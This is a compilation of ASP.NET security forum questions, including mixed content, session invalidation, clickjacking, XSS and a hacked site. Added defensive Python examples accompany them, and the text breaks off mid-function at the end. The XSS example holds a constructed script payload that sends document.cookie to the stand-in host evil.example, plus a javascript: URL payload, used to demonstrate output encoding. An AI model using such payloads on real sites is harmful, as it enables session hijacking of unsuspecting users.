Channel: Security Vulnerability

Script VS SSL



Script error confuses the SSL

We are finalizing an ASP.NET application with Visual Studio 2012 and the .NET Framework 4.0 for ASP.NET, with a Comodo Essential SSL certificate, and the project is running on Windows Server 2008 R2 Web Edition.

HTTP mode works perfectly. HTTPS was fine too, until we got to a page that has several boxes with handles. The content is not displayed because the browser freezes.

It seems to be mixed content: https://developer.mozilla.org/en-US/docs/Security/MixedContent

The person who develops it is unclear about whether IIS (IIS 7 or whatever server) needs to be adjusted, or whether it is the code... I think it is both things.

The person who develops it does not have much knowledge of, or practical experience with, configuring servers.

Thanks forever...
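A browser freezes or blanks a page like the one described above when an https:// page pulls scripts or frames over plain http://; the browser blocks those "active" mixed-content loads and the handlers that depend on them never run. The scanner below is an added example, not code from the original post or the poster's application: it walks the HTML of a page, resolves every sub-resource reference against the page URL and reports the ones that stay on http://. The sample page is constructed to mirror the symptom (boxes whose script comes from an http CDN).

```python
"""Mixed-content scanner: report sub-resources that an https:// page loads over http://.

Added example (not from the original post). The HTML below is constructed; the
page URL and CDN names are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attribute through which each element pulls in a sub-resource.
RESOURCE_ATTRS = {
    "script": "src", "img": "src", "iframe": "src", "link": "href",
    "source": "src", "embed": "src", "object": "data", "video": "src", "audio": "src",
}
# Browsers block these outright ("active" mixed content); the rest only gets a warning.
ACTIVE = {"script", "iframe", "link", "embed", "object"}


class MixedContentFinder(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []  # (severity, tag, absolute_url)

    def handle_starttag(self, tag, attrs):
        attr = RESOURCE_ATTRS.get(tag)
        if attr is None:
            return
        value = dict(attrs).get(attr)
        if not value:
            return
        # urljoin resolves relative ("/x.js") and protocol-relative ("//cdn/x.js") references,
        # both of which inherit https from the page and are therefore fine.
        absolute = urljoin(self.page_url, value)
        if urlsplit(absolute).scheme == "http":
            severity = "blocked" if tag in ACTIVE else "warning"
            self.findings.append((severity, tag, absolute))


def find_mixed_content(page_url, html):
    """Return [(severity, tag, url)] for every http:// sub-resource of an https:// page."""
    if urlsplit(page_url).scheme != "https":
        return []  # mixed content is only defined for secure pages
    finder = MixedContentFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: one hard-coded http script (blocked), one relative
# stylesheet (fine), one protocol-relative script (fine on https), one http image (warning).
SAMPLE_HTML = """
<html><head>
<script src="http://cdn.example.com/jquery-ui.js"></script>
<link rel="stylesheet" href="/styles/site.css">
<script src="//cdn.example.com/handles.js"></script>
</head><body>
<img src="http://images.example.com/logo.png">
</body></html>
"""

if __name__ == "__main__":
    for sev, tag, url in find_mixed_content("https://shop.example.com/boxes.aspx", SAMPLE_HTML):
        print(f"{sev:8} <{tag}> {url}")
```

Run it against the saved HTML of the failing page (or the output of the page's master page and user controls); every "blocked" line is a script or frame that must be changed to a relative or https:// URL. This is an application change, not an IIS setting: IIS only terminates TLS, it does not rewrite the URLs inside the markup.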

IBM App Scan - Session Not Invalidated After Logout


Hi,

After running IBM appScan we received an issue  - "Session Not Invalidated After Logout". Any idea or suggestion on getting rid of this issue?

Thanks.
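AppScan raises "Session Not Invalidated After Logout" when it replays the session cookie it captured before logout and the server still answers as the logged-in user. That happens when logout only expires the browser cookie (or only redirects to the login page) and leaves the server-side session record alive. In ASP.NET the server-side half is Session.Abandon() together with FormsAuthentication.SignOut() for forms authentication; the code below is an added example, not the poster's application, showing the store behaviour the scanner is looking for, with a stand-in session store (names and timeout are assumptions).

```python
"""Server-side session revocation on logout (added example, not the original post's code).

The store is a stand-in for whatever server-side session state the application keeps.
"""
import secrets
import time


class SessionStore:
    def __init__(self, idle_timeout=20 * 60):
        self._sessions = {}          # session_id -> {"user": ..., "last_seen": ...}
        self.idle_timeout = idle_timeout

    def login(self, user, old_session_id=None):
        """Issue a fresh id on authentication; retire any pre-login id (session fixation defence)."""
        if old_session_id:
            self._sessions.pop(old_session_id, None)
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": time.time()}
        return sid

    def logout(self, session_id):
        """Delete the server-side record: the cookie value is worthless even if replayed."""
        self._sessions.pop(session_id, None)

    def user_for(self, session_id, now=None):
        """Resolve a presented session id; None means 'treat the request as anonymous'."""
        now = time.time() if now is None else now
        record = self._sessions.get(session_id)
        if record is None:
            return None
        if now - record["last_seen"] > self.idle_timeout:
            self._sessions.pop(session_id, None)   # idle expiry is enforced server-side too
            return None
        record["last_seen"] = now
        return record["user"]


def logout_response_headers():
    """Headers the logout response should carry so the browser drops its copy as well."""
    return {
        "Set-Cookie": "ASP.NET_SessionId=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Path=/; HttpOnly; Secure",
        "Cache-Control": "no-store",
    }


def replay_after_logout(store):
    """The scanner's check: a cookie captured before logout must not work afterwards."""
    sid = store.login("alice")
    assert store.user_for(sid) == "alice"
    store.logout(sid)
    return store.user_for(sid)   # None once the server-side record is gone
```

The browser-side expiry header on its own does not satisfy the scanner, because the scanner never honours Set-Cookie on logout; only the server forgetting the id does.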

Cross Frame Scripting Vulnerability


We had a third-party security audit and they found a bunch of things that needed to be corrected.  We fixed all of them, except for one.  They claim we still have a problem with Cross Frame Scripting and clickjacking.  The test put our login page within a frame in a page on a completely different website, which could be exploited.  While it is considered a low threat, my boss wants me to resolve this.

What we did originally was put this in the web.config:

<system.webServer>
<httpProtocol>
<customHeaders>
<add name="X-Frame-Options" value="SAMEORIGIN" />
</customHeaders>
</httpProtocol>
</system.webServer>

Apparently this doesn't cut it.  I've looked at other solutions but all I could find was to put JavaScript on every page (in our case in the MasterPage) that checks the frame origin, but I thought something like above would be a better solution.  Has anyone found a solution for this problem?
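The web.config above is the right mechanism; what the auditor checks is the actual response for the login page, so the usual reasons for a repeat finding are that this particular response did not carry the header (a different site, a classic-mode application pool where the customHeaders section is not applied, or an error page served by IIS rather than the application), that the header appears twice with conflicting values, or that the tool wants a Content-Security-Policy frame-ancestors directive as well. The checker below is an added example, not the auditor's tool or the poster's code: it applies the same rule to a captured header block so you can see which case you are in. The header blocks are constructed.

```python
"""Classify a captured HTTP response by its framing protection (added example).

Header blocks below are constructed to show the cases a scanner distinguishes.
"""


def parse_headers(raw):
    """Parse a raw header block (status line + headers) into {name_lower: [values]}."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def frame_ancestors(csp_values):
    """Return the frame-ancestors source list from a CSP header, or None if absent."""
    for csp in csp_values:
        for directive in csp.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return [p.lower() for p in parts[1:]]
    return None


def framing_verdict(raw_response):
    """'protected', 'weak' or 'unprotected' for one response."""
    h = parse_headers(raw_response)
    ancestors = frame_ancestors(h.get("content-security-policy", []))
    if ancestors is not None:
        # Browsers that understand frame-ancestors ignore X-Frame-Options when it is present
        if "*" in ancestors or any(a.startswith("http:") for a in ancestors):
            return "weak"
        return "protected"
    xfo = [v.upper() for v in h.get("x-frame-options", [])]
    if not xfo:
        return "unprotected"        # the header never reached this response
    if len(xfo) > 1:
        return "weak"               # conflicting duplicates are ignored by browsers
    if xfo[0] in ("DENY", "SAMEORIGIN"):
        return "protected"
    return "weak"                   # ALLOW-FROM is not honoured by current browsers


LOGIN_WITH_XFO = """HTTP/1.1 200 OK
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
"""
LOGIN_NO_HEADER = """HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: private
"""
LOGIN_CSP = """HTTP/1.1 200 OK
Content-Security-Policy: default-src 'self'; frame-ancestors 'self'
X-Frame-Options: ALLOW-FROM https://partner.example
"""
LOGIN_DUPLICATE = """HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Frame-Options: DENY
"""
```

Capture the real login response with the browser's network tab or curl -I and run it through framing_verdict; if it comes back "unprotected" the config section is not being applied to that response, and if it comes back "weak" look for a second source of the header (a reverse proxy, a module, or a global Application_BeginRequest that also adds it).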

Securing Upload folders


Hello,

We have a folder on a server where we allow the user to upload a document from the web page.

Currently 'Everyone' has permissions to access this folder.  Is there a specific account that can be used so that we only grant access to the internet users using the system, so that the folder can be locked down from other users who may have access to the server and its folders?

In other words, only the creator and those uploading to the folder via the web page, (and Administrator for the server) would be allowed to read items in this upload folder? 

Thanks for your time, Happy New Year.

Website Hacking


I created and managed an ASP.NET website using C# through Visual Studio 2010 for our church denomination last year.

After a few months it was hacked, but the hacker does not seem to have interfered with the SQL database; they redirected or replaced the front page with Islam-praising content of their own.

I have taken the website down and reported it to the domain provider, but he does not have any solution to the problem. He only knows about WordPress, but since our old church website was done using PHP he was chosen as the provider. After I took part in the committee and, since I wanted to use ASP.NET, we told him; he does not know about Windows-based hosting but gave us a space, since we could manage the whole site.

It was like talking to a wall about the hacking. My question here is, "how vulnerable is an ASP.NET site compared to WordPress websites?" He blamed me for not securing the code and choosing ASP.NET. I don't really know how come? I work in a company and all our websites are just like this website but have never been hacked. Does it mean our work websites are secure only because no one has hacked them? How can I improve the coding or the ASP.NET website?

Please provide a cheap solution to resume our church website, like a domain provider in our country (India). Is it possible to use the same domain name with another domain provider?

Authentication using Mobile number


I am in the process of developing a web API (ASP.NET) for a mobile app. The app wants to do authentication based on mobile number. My idea is:

  1. The user registers using his mobile number (An API will be called)
  2. On registration the user will be sent an OTP.
  3. Once the user confirms the OTP I will validate it with server.
  4. If the OTP is correct I will send an HMAC key to the mobile user.
  5. This HMAC key will be specific to that user only.
  6. For accessing the web API the mobile APP will generate a signature using mobile number, HMAC key and timestamp.

Now, my concern is that there is a web-based Admin panel as well which uses the same web APIs; how would I do authentication for it? To use the Admin panel the user has a username and password. I am looking for a common authentication process. Please advise what the best way to keep authentication common would be, and whether my approach is correct.
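The six steps above already contain the answer to the admin-panel question: the only thing the API ever verifies is an HMAC over the request made with a per-principal secret, so any login flow that ends by issuing such a secret (OTP for the app, username/password for the admin panel) feeds the same verifier. Two details the list does not spell out are worth getting right: the signature must cover the method, path and body (not just mobile number plus timestamp), and the server must reject stale timestamps and repeated nonces, otherwise a captured request can be replayed. The following is an added example, not the poster's code; register/verify_otp/admin_login, the canonical string layout and the in-memory stores are assumptions about how the service would be laid out.

```python
"""HMAC-signed API requests for the mobile app, plus a password login for the admin
panel that ends in the same kind of per-session key, so one verifier serves both.

Added example, not the original post's code. Function names, the canonical string
and the in-memory stores are assumptions. The secret is returned once, over TLS.
"""
import hashlib
import hmac
import secrets
import time

OTP_TTL = 300            # seconds an OTP stays valid
SKEW = 120               # tolerated difference between client timestamp and server clock
PBKDF2_ROUNDS = 100_000
ADMIN_SALT = b"per-user-salt-assumed"


def _now(now):
    return time.time() if now is None else now


class ApiServer:
    def __init__(self):
        self.pending_otp = {}    # mobile -> (otp, expires_at)
        self.keys = {}           # key_id -> {"secret": bytes, "principal": str, "role": str}
        self.seen_nonces = {}    # (key_id, nonce) -> expiry; blocks replay within SKEW
        self.admin_pw = {"admin": hashlib.pbkdf2_hmac("sha256", b"correct horse", ADMIN_SALT, PBKDF2_ROUNDS)}

    # -- steps 1-5: registration by mobile number, key issued after the OTP check --
    def register(self, mobile, now=None):
        otp = f"{secrets.randbelow(10 ** 6):06d}"          # would be sent by SMS
        self.pending_otp[mobile] = (otp, _now(now) + OTP_TTL)
        return otp

    def verify_otp(self, mobile, otp, now=None):
        expected, expires = self.pending_otp.pop(mobile, (None, 0))   # one attempt per OTP
        if expected is None or _now(now) > expires or not hmac.compare_digest(expected.encode(), otp.encode()):
            return None
        return self._issue_key(principal=mobile, role="user")

    # -- admin panel: username/password, but it ends in the same key type ---------
    def admin_login(self, username, password):
        stored = self.admin_pw.get(username)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), ADMIN_SALT, PBKDF2_ROUNDS)
        if stored is None or not hmac.compare_digest(stored, candidate):
            return None
        return self._issue_key(principal=username, role="admin")

    def _issue_key(self, principal, role):
        key_id = secrets.token_hex(8)
        secret = secrets.token_bytes(32)
        self.keys[key_id] = {"secret": secret, "principal": principal, "role": role}
        return key_id, secret

    # -- step 6: one verifier for every request, whoever signed it ---------------
    @staticmethod
    def canonical(method, path, body, ts, nonce):
        body_hash = hashlib.sha256(body).hexdigest()
        return f"{method}\n{path}\n{body_hash}\n{ts}\n{nonce}".encode()

    def verify(self, key_id, method, path, body, ts, nonce, signature, now=None):
        """Return (principal, role) for a valid, fresh, unreplayed request, else None."""
        now = _now(now)
        rec = self.keys.get(key_id)
        try:
            fresh = abs(now - int(ts)) <= SKEW
        except ValueError:
            fresh = False
        if rec is None or not fresh:
            return None
        if self.seen_nonces.get((key_id, nonce), 0) > now:
            return None                                         # replayed request
        expected = hmac.new(rec["secret"], self.canonical(method, path, body, ts, nonce), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, signature):
            return None
        self.seen_nonces[(key_id, nonce)] = now + SKEW
        return rec["principal"], rec["role"]


def sign_request(secret, method, path, body, ts, nonce):
    """Client side: what the app (or the admin panel's front end) attaches to each call."""
    return hmac.new(secret, ApiServer.canonical(method, path, body, ts, nonce), hashlib.sha256).hexdigest()
```

Authorisation (which endpoints an "admin" key may call versus a "user" key) is then a separate check on the role that verify returns; the signing scheme itself is identical for both clients.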

Vulnerability (XSS)


I have a simple website form that takes users' input and saves it to a database (e.g., names and email), very basic information.

Recently it failed a vulnerability scan and I am not sure what the vulnerability below means. Please help!

Cross-Site Scripting (XSS), allowing arbitrary malicious content to run in a legitimate user's session, is possible via a website (login.xxx.mil) system (banner and acceptance page).

Thanks.
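The finding says that something a user can influence (a query-string parameter, a form field, or a stored name shown back on the banner and acceptance page) is written into the page without being encoded for where it lands, so a name like `<script>...</script>` runs in the next visitor's browser. Saving the values to the database is not the problem; rendering them is. The snippet below is an added example, not the site's code: it places the flagged pattern beside the encoded version and checks that the same payload is neutralised. The payloads are constructed.

```python
"""Output encoding for user-supplied values on a banner/acceptance page (added example).

Not the site's code; the render functions and payloads are stand-ins.
"""
from html import escape


def render_banner_unsafe(name, return_url):
    # The pattern scanners flag: raw concatenation into a text node and into an attribute.
    return f"<p>Welcome, {name}</p><a href='{return_url}'>Continue</a>"


def safe_url(url):
    """Only allow same-site relative paths as a 'continue' target (blocks javascript: and off-site)."""
    return url if url.startswith("/") and not url.startswith("//") else "/"


def render_banner(name, return_url):
    # Text node: escape & < > (and quotes, harmlessly); attribute: quoted and escaped;
    # URL: allow-listed by shape, because escaping alone does not stop javascript: links.
    return (f"<p>Welcome, {escape(name)}</p>"
            f"<a href=\"{escape(safe_url(return_url), quote=True)}\">Continue</a>")


# Constructed payloads of the kind a scanner submits.
PAYLOAD_NAME = "<script>document.location='https://evil.example/?c='+document.cookie</script>"
PAYLOAD_URL = "javascript:alert(document.domain)"


def contains_executable_markup(html):
    """Crude oracle used to compare the two renderers: is there a live script or javascript: link?"""
    lowered = html.lower()
    return "<script" in lowered or 'href="javascript:' in lowered or "href='javascript:" in lowered
```

In ASP.NET the text-node case is `HttpUtility.HtmlEncode` (or `<%: %>` / `Html.Encode` in Razor, which encode by default); attribute and URL contexts need `HtmlAttributeEncode` and `UrlEncode` respectively, which is the same split the two render functions show.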

How does hacker create account with admin privileges ?


My ASP.NET site was hacked last week.  I found a user I never put there that had administrative privileges, which I am pretty sure is how the site got sprinkled with a number of .asp, .php, and web.config files that were not supposed to be there, and also the main web.config file had been altered with a redirecting thingy.  The site uses ASP.NET controls for all queries (so they are parameterized), and has only .aspx pages, and a couple of HTML pages.

The purpose of the hack was to redirect any links to my site generated by search engines to other sites.

I have cleaned out all the offending files and seem to have the site back in working order.

My site is low traffic -- maybe 50 visitors a day.  So it seems to me to be a lousy target for a hacker, which makes me conclude that it was likely some kind of automated hack. I can't believe an individual would have sorted through the site adding files here and there, and modifying some files. It just would not be worth their time.

My big question -- how would someone (or even more-so a bot) have been able to create a user with administrative privileges??

I'm thinking it is likely a host problem, but of course they say only my site has reported a hack.
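Whatever the entry point turns out to be, the symptoms in this post (dropped .php/.asp files, extra web.config files in sub-folders, a redirect added to the main web.config) are exactly what a file-integrity baseline catches, and a baseline is also the evidence that settles the "only your site" argument with the host. The script below is an added example, not the poster's code or the host's scanner: it hashes a web root, compares it with a known-good manifest and ranks the differences. The site tree is constructed in a temporary directory; on a real server the baseline comes from the deployment package and the comparison runs against the live web root on a schedule.

```python
"""File-integrity baseline for a web root (added example, not the original post's code).

Detects added, removed and modified files and ranks config edits and executable drops
first. The web root below is constructed; UNEXPECTED_EXT is an assumption about what a
plain ASPX deployment should never contain.
"""
import hashlib
import os
import tempfile

UNEXPECTED_EXT = {".php", ".asp", ".exe", ".dll"}   # assumption for a precompiled-free ASPX site


def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """{relative/posix/path: sha256} for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_sha256(full)
    return manifest


def compare_manifests(baseline, current):
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def triage(diff):
    """Rank findings: web.config changes and foreign executable types first."""
    alerts = []
    for p in diff["modified"]:
        if os.path.basename(p).lower() == "web.config":
            alerts.append(("high", "config modified", p))
        else:
            alerts.append(("medium", "file modified", p))
    for p in diff["added"]:
        ext = os.path.splitext(p)[1].lower()
        if os.path.basename(p).lower() == "web.config":
            alerts.append(("high", "new config in sub-folder", p))
        elif ext in UNEXPECTED_EXT:
            alerts.append(("high", "unexpected executable type", p))
        else:
            alerts.append(("medium", "new file", p))
    for p in diff["removed"]:
        alerts.append(("medium", "file removed", p))
    return alerts


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(data)


def demo():
    """Constructed scenario: clean deployment, then the kind of tampering the post describes."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "web.config", "<configuration/>")
        _write(root, "Default.aspx", "<%@ Page %>")
        baseline = build_manifest(root)
        _write(root, "web.config", "<configuration><!-- redirect added by attacker --></configuration>")
        _write(root, "images/web.config", "<configuration/>")
        _write(root, "images/cache.php", "<?php echo 1; ?>")
        return triage(compare_manifests(baseline, build_manifest(root)))
```

Store the baseline manifest somewhere the web application identity cannot write (it is the first thing an intruder with file access would update), and keep the list of "high" hits together with IIS logs for the same period when you go back to the host.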


WCF Security


Hi all, I'm not sure if this is the appropriate forum for my questions, but here goes. Suppose I have an app that uses WCF to send and receive text messages and image files across the web, and the service needs to be able to go through firewalls. Based on those requirements, I have just three questions:

  1 - Which binding should I use?

  2 - What would be my best security option?

  3 - How do I make sure my data are secure?

Thanks in advance for your reply.

Group based Authentication through Active Directory - restrict access to secured page


The code below works with my AD account groups, and the login page goes to the page I need (mysecurepage.aspx) after I log in using a username and password from the AD group.

However, I'm having a bit of trouble securing the page, in preventing the user from being able to access the page through its URL outside of the login. I can't find an answer for this; can anybody assist?

Imports System.Collections.Generic
Imports System.Configuration
Imports System.Data
Imports System.Data.SqlClient
Imports System.DirectoryServices.AccountManagement
Imports System.Net.NetworkInformation

Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
End Sub

Public Class AllowedADGroup
    Public GroupName As String
    Public AssociatedUserType As String
End Class

Public Function UserHasPreferencesAccess(ByVal UserName As String, ByVal Password As String) As Boolean
    Dim result As Boolean = False
    Dim referringPageName As String = "mystring"
    Dim actualADGroups As List(Of String) = GetGroups(UserName, Password)

    Dim matchingAllowedADGroup As AllowedADGroup = ADgroupsContainAnAllowedGroup(referringPageName, actualADGroups)

    If matchingAllowedADGroup IsNot Nothing Then
        ' has a valid group
        result = True
    End If
    Return result
End Function

Public Function GetGroups(ByVal UserName As String, ByVal password As String) As List(Of String)
    Dim domainName As String = IPGlobalProperties.GetIPGlobalProperties().DomainName
    Dim result As New List(Of String)

    Using context As New PrincipalContext(ContextType.Domain, domainName)
        ' verify credentials first; only look the account up once they are valid
        If context.ValidateCredentials(UserName, password) Then
            Using usr As UserPrincipal = UserPrincipal.FindByIdentity(context, UserName)
                If usr IsNot Nothing Then
                    ' GetAuthorizationGroups also returns nested group memberships
                    For Each p As Principal In usr.GetAuthorizationGroups()
                        ' make sure to add only group principals
                        If TypeOf p Is GroupPrincipal Then
                            result.Add(CType(p, GroupPrincipal).Name)
                        End If
                    Next
                End If
            End Using
        End If
    End Using

    Return result
End Function

Private Function GetAllowedActiveDirectoryGroups(ByVal requestingProductName As String) As List(Of AllowedADGroup)
    Dim retval As New List(Of AllowedADGroup)

    Using sqlCon As New SqlConnection(ConfigurationManager.ConnectionStrings("ConString").ConnectionString)
        Using sqlCmd As New SqlCommand("Client.GetAllowedActiveDirectoryGroups", sqlCon)
            sqlCmd.CommandType = CommandType.StoredProcedure
            sqlCmd.Parameters.Add("@RequestingProductName", SqlDbType.VarChar, 50).Value = requestingProductName

            sqlCon.Open()
            Using sqlr As SqlDataReader = sqlCmd.ExecuteReader()
                While sqlr.Read()
                    Dim newADGroup As New AllowedADGroup

                    If Not sqlr.IsDBNull(0) Then newADGroup.GroupName = sqlr.GetString(0)
                    If Not sqlr.IsDBNull(1) Then newADGroup.AssociatedUserType = sqlr.GetString(1)

                    retval.Add(newADGroup)
                End While
            End Using
        End Using
    End Using

    Return retval
End Function

Private Function ADgroupsContainAnAllowedGroup(ByVal nameOfCallingProduct As String, ByVal adGroups As List(Of String)) As AllowedADGroup
    Dim retVal As AllowedADGroup = Nothing

    Dim allowedADGroups As List(Of AllowedADGroup) = GetAllowedActiveDirectoryGroups(nameOfCallingProduct)

    ' Check the user's AD security groups include one that's allowed, e.g. "myPreferenceUsers"
    For Each grp As String In adGroups
        For Each allowedGroup As AllowedADGroup In allowedADGroups
            If String.Compare(grp, allowedGroup.GroupName, True) = 0 Then
                retVal = allowedGroup
                Exit For ' exit inner loop
            End If
        Next
        If retVal IsNot Nothing Then
            Exit For
        End If
    Next

    Return retVal
End Function

Protected Sub btnLogin_Click(sender As Object, e As EventArgs)
    If UserHasPreferencesAccess(txtUserName.Text, txtPassword.Text) Then
        Response.Redirect("~/mysecurepage.aspx")
    Else
        messagebox.Text = "Login failed. Please check your user name and password and try again."
    End If
End Sub



Receiving errors for a domain I don't control


I have my site set up to email me whenever an error happens, and recently I've been getting an occasional blast of about 50 notifications (once every day or two) about a page not found error, but the weird thing is that the error is for a domain other than my own. Here's an example of the error (my domain isn't ncbels.org). Each error is for a different URL on the same domain. Any idea what could be causing this?

I suspect my site is being used to probe/attack other domains somehow (do you agree?). I'm not sure how to track it down without more information. I searched all my site files for references to that domain, as well as any free text fields in my database, and didn't find anything. My hosting provider ran a scan on my site and said it came up clean. I don't see enough in the stack trace to see where it is coming from.

Error in page https://mail.ncbels.org/owa/auth/logon.aspx?url=https://mail.ncbels.org/owa/redir.aspx%3FC=FE3qhJWgt0aAfmzPSyMaLnaDWOIgz9II6y56Bd7eQcsZhVwlsvJ_kP3W-Npa6H92EX7JFA9UHDQ.%26URL=mailto%253aaritter%2540ncbels.org&reason=0

Message
The file '/owa/auth/logon.aspx' does not exist.

Trace
  CheckVirtualFileExists at offset 9984736 in file:line:column <filename unknown>:0:0 
  GetVPathBuildResultInternal at offset 475 in file:line:column <filename unknown>:0:0 
  GetVPathBuildResultWithNoAssert at offset 103 in file:line:column <filename unknown>:0:0 
  GetVirtualPathObjectFactory at offset 165 in file:line:column <filename unknown>:0:0 
  CreateInstanceFromVirtualPath at offset 43 in file:line:column <filename unknown>:0:0 
  GetHandlerHelper at offset 31 in file:line:column <filename unknown>:0:0 
  GetHandler at offset 37 in file:line:column <filename unknown>:0:0 
  System.Web.HttpApplication.IExecutionStep.Execute at offset 346 in file:line:column <filename unknown>:0:0 
  ExecuteStep at offset 155 in file:line:column <filename unknown>:0:0 

StackTrace
at System.Web.UI.Util.CheckVirtualFileExists(VirtualPath virtualPath) at System.Web.Compilation.BuildManager.GetVPathBuildResultInternal(VirtualPath virtualPath, Boolean noBuild, Boolean allowCrossApp, Boolean allowBuildInPrecompile, Boolean throwIfNotFound, Boolean ensureIsUpToDate) at System.Web.Compilation.BuildManager.GetVPathBuildResultWithNoAssert(HttpContext context, VirtualPath virtualPath, Boolean noBuild, Boolean allowCrossApp, Boolean allowBuildInPrecompile, Boolean throwIfNotFound, Boolean ensureIsUpToDate) at System.Web.Compilation.BuildManager.GetVirtualPathObjectFactory(VirtualPath virtualPath, HttpContext context, Boolean allowCrossApp, Boolean throwIfNotFound) at System.Web.Compilation.BuildManager.CreateInstanceFromVirtualPath(VirtualPath virtualPath, Type requiredBaseType, HttpContext context, Boolean allowCrossApp) at System.Web.UI.PageHandlerFactory.GetHandlerHelper(HttpContext context, String requestType, VirtualPath virtualPath, String physicalPath) at System.Web.UI.PageHandlerFactory.GetHandler(HttpContext context, String requestType, String virtualPath, String path) at System.Web.HttpApplication.MaterializeHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

Query String
url=https%3a%2f%2fmail.ncbels.org%2fowa%2fredir.aspx%3fC%3dFE3qhJWgt0aAfmzPSyMaLnaDWOIgz9II6y56Bd7eQcsZhVwlsvJ_kP3W-Npa6H92EX7JFA9UHDQ.%26URL%3dmailto%253aaritter%2540ncbels.org&reason=0

User Name


Source
System.Web

Help


Error Code
-2147467259

Form Data

Here's another batch of errors so you can see the volume. This is another URL I don't own:

Error in page https://www.themav.com/ts/en-US/c0d1f425f1bc189b.aspx - Message The file '/ts/en-US/c0d1f425f1bc189b.aspx' does not exist. Trace
Error in page https://www.themav.com/ts/en-US/Default.aspx - Message The file '/ts/en-US/Default.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/ts/en-US/9ce13f177b52ebe4.aspx - Message The file '/ts/en-US/9ce13f177b52ebe4.aspx' does not exist. Trace
Error in page https://www.themav.com/store/2acedb3a3f01e5dd.aspx - Message The file '/store/2acedb3a3f01e5dd.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/store/268d393ed863bc30.aspx - Message The file '/store/268d393ed863bc30.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/store/ShoppingCart.aspx - Message The file '/store/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/shoppingcart/f88b8c524dfd5180.aspx - Message The file '/shoppingcart/f88b8c524dfd5180.aspx' does not exist. Trace
Error in page https://www.themav.com/shopping/5a996c38b3c098b8.aspx - Message The file '/shopping/5a996c38b3c098b8.aspx' does not exist. Trace
Error in page https://www.themav.com/shoppingcart/be5f69491555a7db.aspx - Message The file '/shoppingcart/be5f69491555a7db.aspx' does not exist. Trace
Error in page https://www.themav.com/shopping/08ea539bb182f405.aspx - Message The file '/shopping/08ea539bb182f405.aspx' does not exist. Trace
Error in page https://www.themav.com/shoppingcart/ShoppingCart.aspx - Message The file '/shoppingcart/ShoppingCart.aspx' does not exist. Trace
Error in page https://www.themav.com/pages/154ef6207d723d24.aspx - Message The file '/pages/154ef6207d723d24.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/pages/9c64906843289a9f.aspx - Message The file '/pages/9c64906843289a9f.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/shopping/ShoppingCart.aspx - Message The file '/shopping/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/pages/ShoppingCart.aspx - Message The file '/pages/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/order/8d0c5dacfa52ff67.aspx - Message The file '/order/8d0c5dacfa52ff67.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/order/ShoppingCart.aspx - Message The file '/order/ShoppingCart.aspx' does not exist. Trace CheckVirtualFileExists at
Error in page https://www.themav.com/estore/35efd689838d088b.aspx - Message The file '/estore/35efd689838d088b.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/order/1de65df28d6aa5c8.aspx - Message The file '/order/1de65df28d6aa5c8.aspx' does not exist. Trace CheckVirtualFileExists
Error in page https://www.themav.com/cart/d6fe3be2c41a1bc2.aspx - Message The file '/cart/d6fe3be2c41a1bc2.aspx' does not exist. Trace CheckVirtualFileExists

Thanks!
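The URLs in these notifications are assembled by ASP.NET from the request's Host header, and the Host header is whatever the client sent. If the site is bound to its IP without a host name (the catch-all binding), IIS hands it every request that reaches that address, including scanners that walk a list of domains and paths against every IP they know about; each one 404s inside the application and the error mailer dutifully reports `https://www.themav.com/store/ShoppingCart.aspx`. Nothing in the site needs to reference the foreign domain for this to happen, and it is not the site attacking anyone. The script below is an added example, not the poster's code: it splits the mailer output by Host so the foreign traffic is visible at a glance, and gives the front-door rule (accept only your own host names) that stops it reaching the application. The allowed host list is an assumption; the first three log lines are copied from the post and the fourth is constructed.

```python
"""Separate error-mailer lines by the Host header they were generated under (added example).

ALLOWED_HOSTS is an assumption standing in for the poster's real domain(s).
"""
import re
from collections import Counter
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.org", "example.org"}

ERROR_RE = re.compile(r"Error in page (?P<url>\S+) - Message The file '(?P<path>[^']+)' does not exist")


def host_is_ours(url, allowed=ALLOWED_HOSTS):
    host = urlsplit(url).hostname or ""
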